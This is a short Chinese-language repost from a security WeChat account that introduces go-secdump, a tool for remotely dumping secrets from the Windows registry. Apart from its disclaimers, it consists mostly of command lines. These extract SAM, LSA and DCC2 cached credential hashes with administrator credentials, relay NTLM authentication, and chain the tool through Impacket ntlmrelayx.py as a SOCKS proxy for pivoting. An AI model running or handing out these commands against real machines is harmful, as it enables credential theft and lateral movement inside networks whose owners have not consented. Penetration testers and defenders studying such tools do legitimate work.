免责声明:由于传播、利用本公众号Z1sec所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
GitHub - jfjallid/go-secdump :从Windows注册表远程转储机密的工具
地址:https://github.com/jfjallid/go-secdump
使用 SeBackupPrivilege 技巧转储所有注册表密钥:
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --localor./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam --lsa --dcc2
仅转储 SAM、LSA 或 DCC2 缓存密钥:
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --lsa./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --dcc2
使用 NTLM 中继转储注册表机密, Start listener启动侦听器
./go-secdump --host 192.168.0.100 -n --relay
使用上游 SOCKS5 代理转储密钥以进行透视或获取 Impacket ntlmrelayx.py SOCKS 服务器功能的优势使用 ntlmrelayx.py 作为上游代理时,提供的用户名必须匹配 已验证的客户端的密码,但密码可以为空
./ntlmrelayx.py -socks -t 192.168.0.100 -smb2support --no-http-server --no-wcf-server --no-raw-server..../go-secdump --host 192.168.0.100 --user Administrator -n --socks-host 127.0.0.1 --socks-port 1080
原文始发于微信公众号(Z1sec):go-secdump:从Windows注册表远程转储哈希的工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论